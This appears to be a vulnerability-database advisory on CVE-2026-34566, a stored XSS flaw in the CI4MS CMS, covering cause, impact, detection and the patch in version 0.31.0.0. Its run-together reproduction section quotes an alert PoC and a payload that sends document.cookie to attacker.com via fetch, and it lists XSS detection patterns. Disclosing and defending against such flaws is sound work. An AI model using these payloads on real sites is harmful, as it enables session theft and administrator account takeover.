
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34566 is a stored DOM-based cross-site scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton with RBAC authorization and theme support. The flaw exists in the Page Management functionality, where multiple input fields fail to sanitize user-controlled input before storing and rendering it server-side. It affects all CI4MS versions up to and including 0.28.6.0, and was disclosed on March 31, 2026, with a patch released in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) (Github Advisory, GitHub Security Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where the application uses unsafe DOM manipulation methods such as .html() or innerHTML without applying HTML entity encoding to user-supplied data. Affected input fields include page Title, URL, Content, Cover Image URL, Image Width/Height, SEO Description, and SEO Keywords — all of which are stored server-side without sanitization and later rendered in both the administrative page list (/backend/pages/create) and public-facing page views. An attacker with low-privilege access (any authenticated user with page creation or editing permissions) can inject a persistent JavaScript payload that executes automatically in the browsers of all subsequent viewers, including administrators. A proof-of-concept payload (<img src=x onerror=alert(document.domain)>) and a video PoC are publicly documented in the advisory (Github Advisory).
Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of all users who view the affected pages, including unauthenticated public visitors, authenticated users, and administrators. The most severe consequence is full administrator account takeover via session cookie theft, enabling privilege escalation across all roles and complete application compromise. Because the payload persists server-side and executes for every viewer without further attacker interaction, the blast radius extends to the entire user base of the affected CI4MS instance (Github Advisory, GitHub Security Advisory).
A public proof-of-concept exploit with step-by-step reproduction instructions and a video demonstration is available in the GitHub Security Advisory (GitHub Security Advisory). Exploitation requires only low-level authenticated access (any role with page creation/editing permissions) and no user interaction from the attacker after payload injection. The EPSS score is approximately 0.046–0.058%, indicating a low but non-zero probability of exploitation in the wild within 30 days. There is currently no evidence of active in-the-wild exploitation, no known threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Github Advisory).
Page Management → Add Page (endpoint: /backend/pages/create) or open an existing page for editing.<img src=x onerror=alert(document.domain)>. For account takeover, use a payload that exfiltrates session cookies: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">./backend/pages/create or page editing endpoints with unusually long or encoded field values; repeated access to page management views by accounts not typically active in that module.<script>, <img src=x onerror=, onerror=, javascript:) in fields such as Title, Content, SEO Description, or SEO Keywords.The vendor has released a patch in CI4MS version 0.31.0.0, which implements global input validation, enhanced CSRF token refreshing, and XSS protection as part of a major security and framework update (CI4MS Release). All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations, administrators should apply HTML entity encoding to all user-controlled output, avoid unsafe DOM manipulation methods (innerHTML, .html()), implement a strict Content Security Policy (CSP), and set HttpOnly, SameSite, and Secure attributes on session cookies to limit the impact of any XSS exploitation (Github Advisory).
The vulnerability was covered by The Hacker Wire and discussed on Mastodon and Bluesky shortly after disclosure, reflecting standard community awareness for a CMS-level XSS finding. Security aggregators including VulDB, INCIBE-CERT, ENISA EUVD, and GitLab Advisories indexed the advisory. No major vendor statements or notable researcher commentary beyond the original advisory reporters (bugmithlegend and peeefour) have been identified (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."